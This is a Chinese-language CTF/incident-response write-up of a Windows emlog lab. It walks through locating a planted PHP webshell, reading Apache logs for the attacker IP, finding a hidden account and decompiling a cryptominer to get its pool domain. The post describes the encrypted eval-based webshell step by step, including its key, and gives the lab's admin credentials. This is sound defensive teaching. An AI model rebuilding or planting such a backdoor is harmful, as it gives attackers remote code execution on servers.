首页 > 系统相关 >玄机——第四章 windows实战-emlog wp

玄机——第四章 windows实战-emlog wp

时间:2024-07-04 16:57:30浏览次数:27  
标签:shell PC windows emlog FLAG 黑客 wp 服务器 php

文章目录

一、前言

题目链接:第四章 windows实战-emlog

三连私信免费送玄机注册邀请码私信!!!看见就回!!注意私信!!

首先简单了解一下什么是emlog;

Emlog 是一款开源的轻量级博客系统,其名称来自 “Every Memory Log”,旨在为用户提供简单易用的博客平台。Emlog 的设计理念是简洁、高效和轻量,适合个人用户和小型网站。

主要特点

  1. 轻量级

    • Emlog 代码简洁,不依赖复杂的架构,安装和运行都很轻便,资源消耗较低。
  2. 易用性

    • 提供简洁直观的管理后台,用户界面友好,适合没有技术背景的用户。
  3. 插件扩展

    • Emlog 支持插件扩展,用户可以根据需求安装插件来增加功能。
  4. 模板支持

    • 支持模板更换,用户可以选择或自定义模板来改变网站的外观。
  5. 静态页面生成

    • 支持生成静态页面,提高网站访问速度和 SEO 效果。
  6. 多语言支持

    • Emlog 提供多语言支持,适合不同语言背景的用户。

应用场景

  1. 个人博客

    • Emlog 适合个人用户创建和管理博客,记录日常生活和思想。
  2. 小型网站

    • 由于其轻量级和高效性,Emlog 也适合用于创建小型企业网站或作品展示网站。
  3. 自媒体平台

    • 自媒体从业者可以使用 Emlog 搭建个人博客平台,发布和管理内容,建立个人品牌。

总结

Emlog 是一款简洁、高效的轻量级博客系统,适合个人用户和小型网站使用。其易用性和扩展性使其成为许多用户的首选博客平台。通过支持插件和模板,Emlog 可以灵活地扩展功能和定制外观,满足不同用户的需求。

二、概览

简介

服务器场景操作系统 Windows
服务器账号密码 administrator xj@123456
题目来源公众号 知攻善防实验室
https://mp.weixin.qq.com/s/89IS3jPePjBHFKPXnGmKfA
任务环境说明
注:样本请勿在本地运行!!!样本请勿在本地运行!!!样本请勿在本地运行!!!
应急响应工程师小王某人收到安全设备告警服务器被植入恶意文件,请上机排查
开放题目
漏洞修复
参考
https://mp.weixin.qq.com/s/1gebC1OkDgtz4k4YtN10dg

1、通过本地 PC RDP到服务器并且找到黑客植入 shell,将黑客植入 shell 的密码 作为 FLAG 提交;
2、通过本地 PC RDP到服务器并且分析黑客攻击成功的 IP 为多少,将黑客 IP 作为 FLAG 提交;
3、通过本地 PC RDP到服务器并且分析黑客的隐藏账户名称,将黑客隐藏账户名称作为 FLAG 提交;
4、通过本地 PC RDP到服务器并且分析黑客的挖矿程序的矿池域名,将黑客挖矿程序的矿池域名称作为(仅域名)FLAG 提交;

三、参考文章

第四章 windows 实战 - emlog

玄机-windows实战

四、步骤(解析)

准备阶段#1.0

使用远程桌面连接靶机;(详细操作:玄机——第四章 windows实战-wordpress wp

靶机的IP;

在这里插入图片描述

输入进行保存,返回进入即可;

在这里插入图片描述

成功连接靶机;

在这里插入图片描述

步骤#1
通过本地 PC RDP到服务器并且找到黑客植入 shell,将黑客植入 shell 的密码 作为 FLAG 提交;

解题思路

题目让我们通过本机连接靶机(已连接成功),将黑客写入的shell的密码提交,简单来说就是找shell嘛,看过我文章的肯定就已经知道如何查杀shell了(已经不知道说明多少遍了),老规矩嘛,查杀webshell,也就只有工查杀以及工具查杀,这里既然能用工具那肯定就使用工具(工具相对于手工来说更便捷),如对手工查杀webshell感兴趣师傅请移步至:webshell查杀。那这里同样我更喜欢用D盾进行查杀shell(工具不唯一,仅供参考);

简单扫一眼,就在桌面上发现“PHPStudy”,PHPStudy是一款集成了 PHP、Apache、MySQL、Nginx 等常用 Web 开发环境的本地集成开发环境工具。简单来说就是一普通搭建网站的,既然是搭建网站的,那黑客肯定就是从这边下手的咯;(详细:PHPStudy简介);

所以那我们直接鼠标右键PHPStudy“打开文件位置”,接着返回到PHPStudy_pro目录下;

在这里插入图片描述

接着找到PHPStudy_pro目录下的WWW目录,为什么只找WWW目录?

因为在 PHPStudy Pro 中,WWW 目录通常是存放 Web 项目的根目录。这个目录是 Apache 或 Nginx 等 Web 服务器的默认站点目录,所有的 Web 项目文件和代码都会放在这个目录中。

总之,WWW 目录是 PHPStudy Pro 中存放所有 Web 项目文件的地方,是开发和测试 Web 应用的核心目录。

那题目问我们黑客写入的shell,所以我们直接压缩一下WWW目录,导到本机使用D盾进行分析;(所谓的导到本机,就是Ctrl+c,Ctrl+v,注意要先压缩)

在这里插入图片描述

接着使用D盾进行扫描解压之后的WWW目录;

在这里插入图片描述

很快就发现了黑客植入的后门shell.php,那我们跟进分析;

得到;

在这里插入图片描述

题目问我们连接的密码;

所以;

flag{rebeyond}
拓展1.1

简单分析一下这个shell;

这是一个典型的后门程序(backdoor shell),包含了一些隐蔽和加密的特性。

  1. @error_reporting(0);

    • 关闭所有错误报告,以防止暴露错误信息。
  2. session_start();

    • 启动一个新的会话或继续当前会话。
  3. $key="e45e329feb5d925b";

    • 设置一个密钥,这个密钥是一个 16 字节的字符串,通常是某个32位MD5值的前16位。
  4. $_SESSION['k']=$key;

    • 将密钥存储在会话变量中。
  5. session_write_close();

    • 写入会话数据并关闭会话存储,以优化性能。
  6. $post=file_get_contents("php://input");

    • 获取原始 POST 数据。这通常用于接收二进制数据或较大的数据块。
  7. 检查是否加载了 openssl 扩展:

    • if(!extension_loaded('openssl'))

      • 如果没有加载 openssl 扩展,则使用 XOR 和 Base64 解码。
        • base64_decode 解码 POST 数据。
        • 使用 XOR 操作对数据进行解密,每个字符与密钥的对应字符进行异或运算。
    • else

      • 如果加载了 openssl 扩展,则使用 AES-128 加密算法解密数据。
        • openssl_decrypt 解密 POST 数据,使用 AES128 和密钥。
  8. explode('|', $post);

    • 将解密后的数据用 | 分割成一个数组,第一个元素是函数名,第二个元素是参数。
  9. 定义一个类 C:

    • class C{public function __invoke($p) {eval($p."");}}
      • 这个类定义了一个魔术方法 __invoke,它接受一个参数 $p 并执行 eval($p."");
      • eval 函数会执行传入的 PHP 代码,这是一种非常危险的函数,允许执行任意 PHP 代码。
  10. @call_user_func(new C(),$params);

    • 使用 call_user_func 调用类 C 的实例,并将参数 $params 传递给它。
    • 最终的效果是执行解密后从 POST 数据中提取出来的 PHP 代码。

简单总结

这段代码实际上是一个加密的后门程序。它通过接收加密的数据,然后解密并执行其中的 PHP 代码。这使得攻击者可以通过发送特定的加密请求来执行任意的 PHP 代码,从而完全控制服务器。

主要危险点包括:

  • 使用 eval 函数执行任意 PHP 代码。
  • 通过加密隐藏恶意代码,难以被普通的扫描工具检测到。
  • 利用会话和加密机制,使得攻击通信难以被识别和拦截。

这种后门程序常用于网络攻击中的持久访问,通过隐蔽手段保持对受感染服务器的控制。

步骤#2
通过本地 PC RDP到服务器并且分析黑客攻击成功的 IP 为多少,将黑客 IP 作为 FLAG 提交;

解题思路

题目让我们提交黑客的IP,这种没什么说的,基本上就是分析日志了(在别的文章中也强调很多遍,分析日志,这里就不再强调了),那就找PHPStudy_pro存放日志的地方呗;

定位到了,Nginx日志但是发现大小都是0,所以那这里就不是Nginx日志了,去看看Apache2的日志;

在这里插入图片描述

找到Apache日志,发现access.log存在信息很多,右键记事本打开进行分析;

在这里插入图片描述

题一既然说了黑客写入了shell.php,那我们直接Ctrl+f查找关键字“shell”即可;

得到

在这里插入图片描述

得到;

192.168.126.1 - - [26/Feb/2024:22:46:23 +0800] “GET /content/plugins/tips/shell.php HTTP/1.1” 200 -
192.168.126.1 - - [26/Feb/2024:22:46:35 +0800] “POST /content/plugins/tips/shell.php HTTP/1.1” 200 -
192.168.126.1 - - [26/Feb/2024:22:46:35 +0800] “POST /content/plugins/tips/shell.php HTTP/1.1” 200 -
192.168.126.1 - - [26/Feb/2024:22:46:35 +0800] “GET /content/plugins/tips/shell.php?888666=619 HTTP/1.1” 200 -
192.168.126.1 - - [26/Feb/2024:22:47:54 +0800] “POST /content/plugins/tips/shell.php HTTP/1.1” 200 -
192.168.126.1 - - [26/Feb/2024:22:47:54 +0800] “POST /content/plugins/tips/shell.php HTTP/1.1” 200 -
192.168.126.1 - - [26/Feb/2024:22:48:47 +0800] “POST /content/plugins/tips/shell.php HTTP/1.1” 200 -

简单分析一下;

不难看出,黑客在短时间内对 /content/plugins/tips/shell.php 进行了多次请求。这些操作表明,黑客在利用 shell.php 文件进行远程代码执行或文件操作。这是一个典型的 Webshell 攻击,攻击者上传或利用现有的 Webshell 文件,然后通过这些文件执行恶意命令。

所以;

flag{192.168.126.1}
步骤#3
通过本地 PC RDP到服务器并且分析黑客的隐藏账户名称,将黑客隐藏账户名称作为 FLAG 提交;

解题思路

题目让我们找出黑客隐藏的用户名称,既然说用户名称了,那肯定就是查靶机的用户组了呗(window应急的基础操作),“本地用户和组”是在“计算机管理”里面,想找到“计算机管理”其实也简单,直接在搜索栏搜索即可;

搜索栏搜索“计算机管理”;

在这里插入图片描述

接着点击“本地用户和组”进行分析即可;

在这里插入图片描述

可以从描述这边发现,其它都有,就只有这个没有;(或者要不确定,可以都提交一次)

在这里插入图片描述

当然也是可以从用户里面发现;

在这里插入图片描述

最后也是可以发现;

在这里插入图片描述

当然,也可以直接使用“net user”进行查询计算机的所有用户,但是这里好像隐藏了,并没有发现;

在这里插入图片描述

所以最后;

flag{hacker138}
步骤#4
通过本地 PC RDP到服务器并且分析黑客的挖矿程序的矿池域名,将黑客挖矿程序的矿池域名称作为(仅域名)FLAG 提交;

解题思路

让我们找出黑客的挖矿程序的矿池域名,题三既然找到了黑客隐藏的用户,那就跟进分析,一个一个文件进行分析,后来在“桌面”这个目录下发现了,使用英文写的kuang,完事了它还是个exe,所以这里就不必多言,那现在既然找到了挖矿程序,那如何找到矿的域池名呢?

既然现在已经知道挖矿程序了(kuang.exe),那我们直接使用脚本工具“pyinstxtractor.py”把kuang.exe转换成pyc文件,接着随便找一个pyc在线反编译即可发现池域名;

在这里插入图片描述

那我们先来进行实操一下,老规矩想把文件从靶机里面导出之前(kuang.exe),必须先把压缩一下;

pyinstxtractor工具下载

使用方法:Pyinstaller 反编译教程(exe转py)

下载完毕,接着把kuang.exe复制到脚本工具“pyinstxtractor”目录下;

在这里插入图片描述

接着直接在当前目录“cmd”即可;

在这里插入图片描述

命令执行;

python pyinstxtractor.py kuang.exe

得到;

在这里插入图片描述

返回目录进行查看多了一个“Kuang.exe_extracted”文件,接着跟进,翻到底下会发现在zip下有一个“Kuang”空白文件(注意,这里如果是直接的kuang.pyc,那就直接在线工具pyc反编译即可),我们重命名,后缀加上.pyc即可,接着找一个pyc在线反编译即可;

在这里插入图片描述

pyc在线反编译

接着把刚刚修改后缀的文件上传就发现了池域名;

在这里插入图片描述

得到;

http://wakuang.zhigongshanfang.top

根据提交格式:仅域名;

所以最后;

flag{wakuang.zhigongshanfang.top}

当然不想找在线也可以,直接拖进010进行查找也可以;

也是发现了:http://wakuang.zhigongshanfang.top;

在这里插入图片描述

标签:shell,PC,windows,emlog,FLAG,黑客,wp,服务器,php
From: https://blog.csdn.net/administratorlws/article/details/140125250

相关文章

  • Windows部署语音转文字项目_Whisper
    Windows部署语音转文字项目_WhisperWindows部署语音转文字项目_Whisper一、前置安装准备Github源仓库,Whisper下载安装whisper及其依赖项官方有两种部署方法,一种是通过默认pip源拉取安装:以管理员身份运行powershell,输入如下命令pipinstall-Uopenai-whisper因国内网络......
  • Windows bat批处理文件结束某个程序进程,删除文件夹
    Windowsbat批处理文件结束某个程序进程,删除文件夹bat文件内容:@echooffsetlocal::要结束的应用程序进程名set"PROCESS_NAME=助手.exe"::使用tasklist和findstr检查进程是否存在tasklist|findstr/I/C:"%PROCESS_NAME%">nulif%ERRORLEVEL%eq......
  • Windows11系统System.Workflow.Activities.dll文件丢失问题
    其实很多用户玩单机游戏或者安装软件的时候就出现过这种问题,如果是新手第一时间会认为是软件或游戏出错了,其实并不是这样,其主要原因就是你电脑系统的该dll文件丢失了或没有安装一些系统软件平台所需要的动态链接库,这时你可以下载这个System.Workflow.Activities.dll文件(挑选合......
  • Windows11系统System.Windows.Forms.DataVisualization.resources.dll文件丢失问题
    其实很多用户玩单机游戏或者安装软件的时候就出现过这种问题,如果是新手第一时间会认为是软件或游戏出错了,其实并不是这样,其主要原因就是你电脑系统的该dll文件丢失了或没有安装一些系统软件平台所需要的动态链接库,这时你可以下载这个System.Windows.Forms.DataVisualization.re......
  • Windows Server2022怎么做文件共享?
    一、共享设置1、在打开的“服务器管理器”仪表板中,点击左侧菜单栏中的“文件和存储服务”-->“共享” 新建共享,我们这里使用“SMB共享-快速”、如果需要也可以使用“SMB共享-高级”两者各有侧重,看自己的实际需要:选择要共享的文件夹位置: 设置共享权限比较重要,我们要禁用......
  • 【资源分享】初中生谭景元开发的Windows12真漂亮
    这个名为Windows12网页版的项目的作者谭景元(网名:星源),是一位年仅14岁的中国初中生。据他公开的简介显示,他出生于2009年5月,在成都完成了小学教育并目前就读于当地的初中。尽管年纪不大,他已经获得了两个显赫的奖项:CSP普及组一等奖(CSP是CCF面向社会非专业人士推出的能力认证......
  • 推荐一款Win11主题WPF UI框架
    最近在微软商店,官方上架了新款Win11风格的WPF版UI框架【WPFGalleryPreview1.0.0.0】,这款应用引入了前沿的FluentDesignUI设计,为用户带来全新的视觉体验。WPFGallery简介做为一关注前沿资讯的开发人员,首先关注的是应用WPFGallery到我们的程序中,需要具备的条件:.N......
  • windows terminal 中运行 miniconda 和 pip 的虚拟环境
    pip创建的虚拟环境使用命令python-mvenvhf创建虚拟环境后,在激活时,会遇到一个错误,原因是powershell启动了严格的审查脚本策略。这个错误信息表明你尝试在PowerShell中运行一个脚本(具体是激活一个虚拟环境),但是你的系统设置阻止了未经签名的脚本的执行。PowerShell有一个叫......
  • [java]windows下jdk安装包所有版本系列下载地址汇总国内源下载
    jdk1.8及其以前版本可以参考[java]windows和linux下jdk1.8安装包所有版本系列下载地址汇总,这里只发布jdk9及其以后最新版本。注意下面均为windowsx64版本安装包exe格式序号java版本下载地址1jdk-22.0.1-windows-x64-bin.exe点我下载2jdk-21.0.3-windows-x64-bin.exe点我下......
  • IDLE-python windows官方安装包下载国内镜像下载地址汇总
    此为IDLE-windows安装包,exe格式只能在windowsx64系统下面使用序号版本名称下载地址1IDLE-python-3.12.4-amd64.exe点我下载2IDLE-python-3.11.9-amd64.exe点我下载3IDLE-python-3.10.11-amd64.exe点我下载4IDLE-python-3.9.13-amd64.exe点我下载5IDLE-python-3.8.10-amd6......